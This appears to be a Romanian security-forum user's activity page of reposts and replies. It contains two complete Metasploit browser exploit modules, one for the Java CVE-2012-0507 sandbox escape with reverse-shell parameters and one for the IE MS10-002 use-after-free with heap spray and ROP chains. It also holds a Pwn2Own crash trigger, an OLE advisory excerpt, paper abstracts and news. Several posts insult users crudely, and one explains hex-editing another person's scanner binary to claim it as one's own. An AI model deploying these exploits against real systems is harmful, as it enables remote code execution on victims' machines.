Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=1]Java AtomicReferenceArray Type Violation Vulnerability[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability', 'Description' => %q{ This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', # metasploit module 'juan vazquez', # metasploit module 'egypt' # special assistance ], 'References' => [ ['CVE', '2012-0507'], ['BID', '52161'], ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'], ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 14 2012' )) end def exploit # load the static jar file path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" ) fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close super end def on_request_uri( cli, request ) data = "" host = "" port = "" peer = "#{cli.peerhost}:#{cli.peerport}" if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status("#{peer} - Sending #{self.name}") payload = regenerate_payload( cli ) if not payload print_error("#{peer} - Failed to generate the payload." ) return end if target.name == 'Generic (Java Payload)' if datastore['LHOST'] jar = payload.encoded host = datastore['LHOST'] port = datastore['LPORT'] vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" ) else port = datastore['LPORT'] datastore['RHOST'] = cli.peerhost vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." ) end if jar print_status( "Generated jar to drop (#{jar.length} bytes)." ) jar = Rex::Text.to_hex( jar, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end else # NOTE: The EXE mixin automagically handles detection of arch/platform data = generate_payload_exe if data print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) else print_error("#{peer} - Failed to generate the executable." ) return end end send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } ) return end print_status( "#{peer} - sending jar..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html( data, jar, host, port ) jar_name = rand_text_alpha(rand(6)+3) + ".jar" html = "<html><head></head>" html += "<body>" html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">" html += "<param name=\"data\" value=\"#{data}\"/>" if data html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar html += "<param name=\"lhost\" value=\"#{host}\"/>" if host html += "<param name=\"lport\" value=\"#{port}\"/>" if port html += "</applet></body></html>" return html end def generate_jar() return @jar_data end end Sursa: Java AtomicReferenceArray Type Violation Vulnerability
  2. Nytro

    Decompilator

    Nytro replied to cristiz0ne's topic in Programare

    Exista programe care pe baza unor semnaturi iti arata ce posibilitati ar putea fi. Java? Asta e altceva, are cumva extensia .jar sau .class? Daca e .exe sau .dll, vezi: PEiD Vezi si PE Explorer si multe alte programe utile...
  3. Nytro
    Ia ban, rapid si usor.
  4. Nytro

    Query Havij

    Nytro replied to SticKyWoX's topic in Off-topic

    Chestia aia e valabila numai daca te conectezi folosind JDBC la MySQL, iti permite sa folosesti multiple queries, dar MySQL nu te opreste sa executi mai multe query-uri, e pentru driver-ul JDBC nu pentru MySQL. A se vedea si: http://se2.php.net/manual/en/mysqli.multi-query.php
  5. Nytro

    Query Havij

    Nytro replied to SticKyWoX's topic in Off-topic

    Mda.. mysql> select table_name from tables limit 1; select column_name from columns limit 1; +----------------+ | table_name | +----------------+ | CHARACTER_SETS | +----------------+ 1 row in set (0.00 sec) +--------------------+ | column_name | +--------------------+ | CHARACTER_SET_NAME | +--------------------+ 1 row in set (0.07 sec) mysql> Iar: PHP: mysql_query - Manual resource mysql_query ( string $query [, resource $link_identifier = NULL ] ) mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier.
  6. Nytro
    Browser-ul face request catre serverul DNS al ISP-ului. Scurt. Daca nu e gasit domeniu, se face cautarea mai departe in ierarhie pana ajunge la un server root. Browser-ul nu are nicio treaba cu serverul root, nu stie "cine" este, request-urile sunt forwardate intre serverele DNS.
  7. Nytro

    Query Havij

    Nytro replied to SticKyWoX's topic in Off-topic

    Poate daca ati citi si voi despre SQL (Structured Query Language) si despre un SGBDR (Sistem de Gestiune al Bazelor de Date Relationale) nu ati mai pune intrebari negandite.
  8. Nytro
    1) Serverele Root DNS (globale) sunt publice, deci nu au obtinut nimic 2) Nu vad legatura cu "hackingul" 3) Serverele nu sunt ale lui Vasile, foarte probabil se da DROP la toate pachetele care nu vin de la sub-servere DNS, probabil au si ele un firewall hardware 4) Tu cand intri pe RST, rezolvare DNS nu se face pe un server DNS global, deci utilizatorii nu vor avea nicio problema 5) Dureaza pana sa se propage domeniile noi, insa cele existente se afla pe alte servere DNS care tin de ISP, deci nu vor fi probleme Asa cum ma gandeam, copii copaci, in cel mai rau caz incetinesc propagarea noilor domenii (inregistrate atunci), dar se vede ca nu ii duce capul.
  9. Nytro
    Ba, voi ganditi ce spuneti? Cum cacat faceti voi 250k dolari cu o vulnerabilitate? Poate sa ai cumva un RCE in sshd sa poti avea acces la toate serverele pe SSH din lume, sau in Apache sa poti executa cod pe 50% din web serverele din lume... Si uite ca nu vad nimic despre XSS si SQLI... Dar vai, nu dau guvernele 100k pentru un SQLI? Nu considera "hacking" un SQLI? Te mai baga si la inchisoare pentru unul?
  10. Nytro
    E de acum 3 ani, nu cred ca mai e "util" DESI Loader-ul e un ActiveX care nu cred ca e foarte detectat.
  11. Nytro
    Are dreptate, cel putin din perspectiva din care vorbeste, dar aceleasi principii se aplica peste tot. Sa luam exemplu cu SQL Injection. Vine Vasile si gaseste un SQL Injection intr-un site. Bun, asta inseamna ca e "calificat" pentru un post de pentester, sau faptul ca a gasit un rahat de SQL Inection intr-un site il face pentester? NU. Ca sa poti fi un penterster bun trebuie sa stii in primul rand MYSQL. Da, trebuie sa stii limbajul SQL. Si asta ar fi doar o BAZA DE CUNOSTINTE. Nu e deloc de ajuns. Trebuie sa stii SQL Server, sa stii Oracle, sa stii si SQLite, si nu numai ca sisteme de gestiune a bazelor de date, dar si ca vectori de atac si foarte multa administrare. Trebuie sa stii si ASP.NET si Ruby nu doar PHP, pentru ca nu toate site-urile sunt scrise in PHP. Si asta e important, pentru ca pentru pentesting nu vor plati firme de 2 lei, ci vor plati firme mari care NU FOLOSESC MySQL si PHP ci folosesc alte tehnologii: Oracle, ASP.NET... Cati dintre voi (care pretindeti ca stiti PHP si MySQL, dar nu cred ca ati scris mai mult de 1000 de linii de cod in aceste limbaje) cunosteti ASP.NET sau alte tehnologii? Cate linii de cod ati scris pentru a putea afirma ca puteti gasi si FIXA cod vulnerabil? Credeti ca stiind sa folositi un UNION pentru MySQL, sau sa puneti un ../../etc/passwd e de ajuns, gata, va scrieti in frunte PENTESTER? Daca considerati asta, e clar, sunteti limitat grav de tot. Si de vina sunt tutorialele de 2 lei pe care le cititi. De fapt, nu tutorialele, ci faptul ca sunt scurte, si asta e singurul lucru care va convinge sa le cititi, dar va si limiteaza, pentru ca invatand un lucru, nu realizati faptul ca mai sunt inca 1000 care ar trebui stiute, si va considerati niste zei...
  12. Nytro
    Elena?
  13. Nytro
    Deep Dive into OS Internals with Windbg Malware and OS Internals An approach towards reversing malwares, shellcodes and other malicious codes to understand the ways in which they use the OS Internals for their functionality. Preface ............................................................................................................................................................................3Reversing Windows Internals..........................................................................................................................................4 Portable Executable Anatomy.........................................................................................................................................5 Data Directories of Interest.............................................................................................................................................7 Import Directory..............................................................................................................................................................8 Import Address Table....................................................................................................................................................12 Export Directory ............................................................................................................................................................13 Manual Walkthrough of Export Directory.....................................................................................................................14 Process Environment Block...........................................................................................................................................17 Different methods to locate the PEB ............................................................................................................................18 Understanding an Example Shellcode...........................................................................................................................20 Using _PEB_LDR_DATA .................................................................................................................................................20 Using _LDR_DATA_TABLE_ENTRY.................................................................................................................................23 Practical Example with Rustock.B Rootkit.....................................................................................................................25 Conclusion.....................................................................................................................................................................32 References.....................................................................................................................................................................33 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18576.pdf
  14. Nytro
    Pwn2Own Challenges: Heapsprays are for the 99% BY PETER VREUGDENHIL THU 15 MAR 2012 In case you arent familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The cve in question (cve-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following poc: <html> <head> <script> function Start() { var TableClone = document.getElementById('tableid').cloneNode(1); var TableCellUrns = TableClone.cells.urns('a'); //var bla = TableClone.cells.item(1); var TableCellUrnsTags = TableCellUrns.tags('a'); TableClone.outerText = 'a'; Result = TableClone.cells; Result = TableCellUrnsTags.item(-1); } </script> </head> <body onLoad="window.setTimeout(Start,100);" id="bodyid"> <table id="tableid"> <tr><th id="thid"></th></tr> <tr id="trid"><td id="tdid"></td></tr> </table> </body> </html> Download here This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it. Articol complet: http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup
  15. Nytro
    [h=1]MS10-002 Internet Explorer Object Memory Use-After-Free[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Internet Explorer's mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. This particular vulnerability was also one of 2012's Pwn2Own challenges, and was later explained by Peter Vreugdenhil with exploitation details. Instead of Peter's method, this module uses heap spraying like the 99% to store a specially crafted memory layout before re-using the freed memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Vreugdenhil', # Vulnerability discovery and exploit writeup 'juan vazquez', # Metasploit 'sinn3r' # Metasploit ], 'References' => [ [ 'MSB', 'MS10-002'], [ 'CVE', '2010-0248' ], [ 'OSVDB', '61914'], [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-014/'] ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 }, ], [ 'IE 8 on Windows 7 SP0', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7c348b05 } ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 21 2010", 'DefaultTarget' => 0)) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[1] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ return targets[2] #IE 8 on Windows 7 SP1 with JRE else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") send_not_found(cli) return end js_code = build_javascript(my_target) html = %Q| <html> <head> <script> #{js_code} </script> </head> <body onLoad="window.setTimeout(Start,100);" id="bodyid"> <table id="tableid"> <tr><th id="thid"></th></tr> <tr id="trid"><td id="tdid"></td></tr> </table> </body> </html> | print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end def build_javascript(my_target) p = get_payload(my_target) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) # The exploit will try to take up the freed memory # with a fake item before the reuse fake_item = [ junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, 0x0c0c003c, # pointer to c_table_cell junk, junk, junk, 0x0c0c0050, # pointer to c_cache_item junk, junk, ].pack("V*") fake_item_js = Rex::Text.to_unescape(fake_item) # Here start the crafted layout of the memory # which will be sprayed to get code execution # IE 8 => Spray be sprayed into 0c0c0024 memory_layout = [ junk, junk, junk, junk, junk, junk, 0x0c0c0040, # ----- points to 0x0c0c0040 0x0c0c0c0c, # <---| 0x0c0c0c0c + 0x70: 0x0c0c0c7c will store the stackpivot with eax pointing to 0c0c0c0c junk, junk, 0x00000000, # Allows to bypass CTableCell::GetAAcolSpan junk, # Stored at 0c0c0c50 junk, junk, 0x0c0c0078, junk, junk, junk, junk, junk, 0x0c0c0c50, # <- Stored at 0c0c0074 (0x0c0c0078 - 4) 0x00000001 # Stored at 0c0c0078 (0c0c0050+28) # Allows to exit of CTableRowCellsCollectionCacheItem::GetNext faster ].pack("V*") memory_layout_js = Rex::Text.to_unescape(memory_layout) # Steps: # 1. Force the free. # 2. Try to reuse the freed memory with a fake item. # The fake item store crafted pointers to the # memory which will be sprayed on step 3. # 3. Heap Spray: Shellcode + crafted memory layout to # get execution flow when the memory freed in step 1 # is reused in step 4. # 4. Force the memory reuse. spray = <<-JS function Start() { var fake_items = unescape("#{fake_item_js}"); while (fake_items.length < 0x1000) fake_items+= fake_items; var fake_item = fake_items.substring(0, (96-6)/2); var code = unescape("#{js_code}"); var memory_layout = unescape("#{memory_layout_js}") var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length); var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block_shell = shellcode.substring(0, (0x80000-6)/2); var heap = new heapLib.ie(0x20000); var TableClone = document.getElementById('tableid').cloneNode(1); var TableCellUrns = TableClone.cells.urns('a'); var bla = TableClone.cells.item(1); var TableCellUrnsTags = TableCellUrns.tags('a'); TableClone.outerText = 'a'; heap.gc(); for(i = 0; i < 30; i++) { heap.alloc(fake_item); } for (var i=1; i < 0x1C2; i++) { heap.alloc(block_shell); } Result = TableClone.cells; Result = TableCellUrnsTags.item(1); } JS spray = heaplib(spray, {:noobfu => true}) return spray end def nop return make_nops(4).unpack("V").first end def junk(n=4) return rand_text_alpha(n).unpack("V").first end # ROP chain + shellcode will be sprayed at 0x0c0c0c0c def get_payload(t) # chain generated by mona.py - See corelan.be case t['Rop'] when :msvcrt rop = [ 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00000800, # <- change size to mark as executable if needed (-> ebx) 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end code = rop code << make_nops(38) code << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+0x6").encode_string # instr length: 2 bytes code << [t.ret].pack("V") # Stack Pivot code << payload.encoded return code end end =begin (694.cc0): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000100 ecx=0241f518 edx=7c90e4f4 esi=7c90d6d0 edi=ffffffff eip=7c8022cf esp=0241f534 ebp=0241f548 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 kernel32!WriteProcessMemory+0x6d: 7c8022cf cc int 3 =end Sursa: MS10-002 Internet Explorer Object Memory Use-After-Free
  16. Nytro
    Da redox, ai dreptate, vad peste tot persoane care vor salarii de 1500-2000 de euro pe luna. Marea majoritate studenti la informatica. La fel, se aplica si ratatilor de pe RST. Ce pula mea stiti voi sa faceti de banii astia? Ce ar trebui sa faca cineva sa ii dati 2000 de euro pe luna? Sa fim seriosi, chiar daca ati avea bani, nici celei mai smechere tarfe nu i-ati da atatia bani, dar cand e vorba de primit toti vreti o gramada de bani si mai vreti pentru nimic. Sa iau exemplul meu clasic: studentii din facultatea mea, informatica. Ce stiu sa faca? Sa suga pula. Nu stiu NICI ce se face la facultate, desi sunt tocilari si iau note mari, daca dupa 2 luni ii intrebi cum se supraincarca operatorul cast in C++ o sa iti vina sa ii iei la palme. Astia nu stiu nici ce e ala HTTP, nu stiu ce inseamna TCP, nu stiu ce un DLL si nu stiu ce face grep, insa cand vine vorba de salarii... "Tati, eu vreau sa fiu programator si sa am 1000 de euro primul salariu, ca eu sunt pula de destept". Asa e si aici. Va credeti toti destepti pentru ca gasiti un XSS/SQLI. Vreti sa deveniti "pentesteri" crezand ca bubuiti de desteptaciune. Si mai presus de toate vreti minim 2000 de euro pentru asta. Sau vreti sa deveniti programatori, si desi NU ATI SCRIS 200 DE LINII DE COD in viata voastra, sa va ofere cineva mii se euro, sa aveti biliard, whisky si tarfe la munca si sa nu lucrati nimic... Treziti-va la realitate...
  17. Nytro

    Decompiler c++

    Nytro replied to usage's topic in Programare

    Ceea ce vrei sa faci se cheama mai putin tehnic "hexat", adica vrei sa iei munca altuia, si sa modifici textele doar. Nu stiu ce cacat contin cacaturile de le folositi voi la scanat, dar probabil sunt programe C compilate. Un decompilator nu o sa te ajute prea mult, mai ales ca din modul de exprimare realizez ca nu sunt tocmai detalii care sa te intereseze. Ca sa intelegi: - invata putin C pe Linux - citeste despre structura executabilelor de pe Linux (cauta "ELF File Format") - vezi ce face un debugger Ca sa nu intelegi nimic si doar sa modifici un text, ceea ce 99% vei face: - cauta un Hex Editor (indiferent ca e pentru Linux sau Windows) - deschide acel fisier executabil - modifica acele texte DAR ai grija ca lungimea textului pe care il introduci sa fie EXACT lungimea textului anterior pentru a nu strica structura executabilului. Poti incerca sa pui un \0 daca ai un text mai scurt, sau te poti risca sa depasesti putin, dar sa nu te miri apoi daca o sa crape programul - trimite apoi programul tuturor si lauda-te cu munca altuia (oricum, probabil persoana de dinaintea ta a procedat la fel), cum ca tu l-ai facut
  18. Nytro
    Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation Tarjei Mandt Norman Threat Research tarjei.mandt @ norman.com Abstract. One of the most prevalent bug classes aecting Windows ker- nel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the deref- erenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory man- ager and does not introduce any oending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal. Keywords: null pointer vulnerabilities, exploitation, mitigation Download: http://www.mista.nu/research/nullpage.pdf
  19. Nytro
    Da, smechera
  20. Nytro
    Misca-te in Real/Carrefour/Cora la raionul cu bauturi...
  21. Nytro
    Dupa ceva timp... Cyber Criminals Selling Millions of U.S military email addresses Yet Another Google Chrome Sandbox Critical Exploit by Turkish security experts Kaspersky finds Malware that resides in your RAM The Linux Tips Exploit For Ms12-020 RDP Bug Moves to Metasploit MS12-002 Microsoft Remote Desktop Use-After-Free DoS MS12-020 Vulnerability for Breakfast Symantec Identifies New Duqu Trojan Driver Variant Address spoofing vulnerability in iOS's Safari Advanced Firewall Configurations with ipset Java Applet Same-Origin Policy Bypass via HTTP Redirect Source Code Spoofing with HTML5 and the LTO Character Debian's x11-common init script weakness (CVE-2012-1093) Portable Executable File Format – A Reverse Engineer View Adobe Photoshop 12.1 Tiff Parsing Use-After-Free Compiling Nmap for Android BackTrack tool review: goofile VIDEO: How to solve the RSA 2012 Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit Debugger Inception – The Scriptable Debugger Within The Debugger Compiling Nmap for Android BackTrack tool review: goofile An interesting case of JRE sandbox breach (CVE-2012-0507) Insecure magazine - RSA Conference Reverse Engineering Firmware: Linksys WAG120N Microsoft OLE for Windows code execution România ?i criminalitatea informatic?, tendin?e What's New in Linux 3.3? Updated: https://www.facebook.com/rstforum
  22. Nytro
    [h=2]What's New in Linux 3.3? [/h] Tuesday, 20 March 2012 10:54 Joe 'Zonker' Brockmeier Sunday, Linus Torvalds released the 3.3 Linux kernel. In the latest installment of the continuing saga of kernel development, we've got more progress towards Android in the kernel, EFI boot support, Open vSwitch, and improvements that should help with the problem of Bufferbloat. Is it just me, or is it still a little weird to be talking about 3.x kernels? It's been about eight months since the official bump to 3.0, but that's compared to more than seven years with the 2.6.x series. At any rate, here we are. Let's take a look at some of the changes in Linux 3.3! [h=3]Everybody was Bufferbloat Fighting![/h] The Android patches are likely to get the most attention in 3.3, but the thing that I'm most excited by? More work going on to solve the Bufferbloat problem. In a nutshell, Bufferbloat is a symptom of a lot of small problems that creates "a huge drag on Internet performance, ironically, by previous attempts to make it work better. Or the one-sentence summary, "bloated buffers lead to network-crippling latency spikes." It's not a problem that's going to be solved all in one go, or in one area. But the Linux kernel is one of the pieces that needs addressing. In the 3.3 release, we've got the ability to set byte queue limits in the kernel. [h=3]Driver Goodies[/h] Check out the list of drivers that have made it out of staging. Specifically, the gma500 driver is out of staging. This means the infamous Poulsbo chipset should be supported in the mainline kernel finally. This release also includes the NVM Express driver (NVMe) which supports solid state disks attached to the PCI-Express bus. Most SSDs are SATA, Fibre Channel or SAS drives. The work was done by Intel's Matthew Wilcox, which isn't surprising since the NVM Express standard is also supported by Intel and a number of other companies. Would love to get my hands on one of these drives to test the 3.3 kernel out... Want to tether your Linux box to your brand new iPhone? The iPhone USB Ethernet Driver (ipeth) module has been updated to add support for the iPhone 4S. The 3.3 kernel also picks up some drivers for third generation Wacom Bamboo tablets and Cintiq 24HD, and initial driver support for the Intuos4. [h=3]Open vSwitch[/h] Another biggie in 3.3? The Open vSwitch project is merging into the kernel tree. It's not new – it's been around for some time – but it's finally making its way into the mainline kernel. (This seems to be a frequent theme, doesn't it?) Basically, Open vSwitch is a virtual switch for complex virtualized server deployments. Given the ever-growing popularity of virtualized servers and cloud deployments, this is something in high demand. As the Open vSwitch page says, "Open vSwitch can operate both as a soft switch running within the hypervisor, and as the control stack for switching silicon. It has been ported to multiple virtualization platforms and switching chipsets. It is the default switch in XenServer 6.0, the Xen Cloud Platform and also supports Xen, KVM, Proxmox VE and VirtualBox. It has also been integrated into many virtual management systems including OpenStack, openQRM, and OpenNebula." No doubt, you'll be reading more about Open vSwitch on Linux.com in the near future. [h=3]Android Comes Closer[/h] Last, but not least, the 3.3 kernel includes nearly complete support for Android. This is good news all around, but isn't really a surprise. The kernel folks have been working on this for a long time. Now the question is, will we start seeing Android apps on top of normal distributions? Will we start seeing standard Linux apps running on Android? Will mod communities, like CyanogenMod, start using the mainline kernel? Should be an interesting year. Then again, when isn't it an interesting year when Linux is involved? As usual, the release includes lots more fixes, new drivers, and so forth. Check out the Kernel Newbies page for more. The merge window for 3.4 is now open, with the traditional two-week cutoff for pull requests. Looking forward to what 3.4 brings! Sursa: https://www.linux.com/news/featured-blogs/196:zonker/556270:whats-new-in-linux-33
  23. Nytro
    [h=1]România ?i criminalitatea informatic?, tendin?e[/h]20 Martie 2012 Ast?zi a avut loc la Banca Na?ional? prima parte a conferin?ei România, încotro? Criminalitatea informatic? în secolul 21, organizat? de Oxygen Events. Sunt câteva concluzii interesante pe care o s? le comentez un pic, mai jos. Prima este c? atacurile informatice devin din ce în ce mai sofisticate, dar asta nu era ceva nou. O noutate ar fi c? autorit??ile nu bat pasul pe loc. Exist? o colaborare direct? cu IGPR, divizia de combatere a criminalit??ii informatice. Exist? un forum de lucru al BNR care trateaz? problemele cybercriminalitate, o comisie inter-bancar? care se ocup? de cazurile cele mai importante care privesc b?ncile, clien?ii sau institu?iile din domeniu. Armin Dinar, risk manager la PriceWaterhouse Coopers, a prezentat un studiu detaliat privind amenin??rile informatice ?i principalele temeri ale companiilor ?i institu?iilor afectate. Nu pierderea banilor era pe primul loc, ci pierderea prestigiului sau a imaginii în industrie. Ioana Vasiu, care a moderat sesiunea de deschidere, a spus c? la ora actual? cybercrimimalitatea atinge 388 miliarde de dolari pe an, aproape de valoarea traficului de droguri la nivel mondial care a fost calculat? anul trecut la 411 miliarde de dolari. “Este clar spre ce anume se mut? industria criminalit??ii”, a subliniat ea. Andrei Petru?, product manager Bitdefender - amenin??rile se mut? în rimt rapid spre terminalele mobile. Sistemele de operare mobile sunt sigure, dar fenomene precum jailbreak ?i decodarea terminalelor deschid calea spre atacuri informatice tot mai periculoase. Cre?terea num?rului de atacuri asupra dispozitivelor mobile în 2011 a fost de 4500%, a ad?ugat el. Via: SecuritateIT Sursa: România ?i criminalitatea informatic?, tendin?e - Securitate IT
  24. Nytro
    Microsoft OLE for Windows code execution ####################################################################### Luigi Auriemma Application: Microsoft OLE for Windows http://www.microsoft.com Versions: ole32.dll < 5.1.2600.6168 Platforms: Windows XP and 2003 before 13 Dec 2011 NOT vulnerable: any other OS from Windows Vista Bug: code execution Exploitation: remote and via file Date: found 16 May 2011 patched 13 Dec 2011 adv/PoC 20 Mar 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org Additional references: http://technet.microsoft.com/en-us/security/bulletin/ms11-093 http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=966 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400 ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From the iDefense's advisory: "Many Windows applications that support the structured storage file format (Office applications for example) contain support for reading the SummaryInformation stream inside of the OLE document. This stream contains various properties that describe the document (the author for example). In addition to Office, Windows Explorer also supports parsing these streams when a file is clicked and viewed via the preview pane." ####################################################################### ====== 2) Bug ====== First a couple of links about the OLE compound format: http://poi.apache.org/hpsf/internals.html http://msdn.microsoft.com/en-us/library/aa380072%28v=vs.85%29.aspx Example of an HPSF header referred to the provided Visio proof-of-concept: offset bytes description 1200 2 0xfffe 1202 2 0 1204 4 operating system 1208 16 clsid:0 1218 4 1 121c 16 clsid:F29F85E0-4FF9-1068-AB91-08002B27B3D9 122c 4 offset from the 0xfffe header 1230 4 section size 1234 4 number of properties (0xb) 1238 4 property type (for example 2 for title, 4 author and so on) 123c 4 property offset (relative to 0x1230) ... 1288 4 property type 0x11 (VT_CF) used for PID_THUMBNAIL 128c 4 the original was located at offset 1358, now 13da For exploiting the vulnerability it's necessary to use the VT property 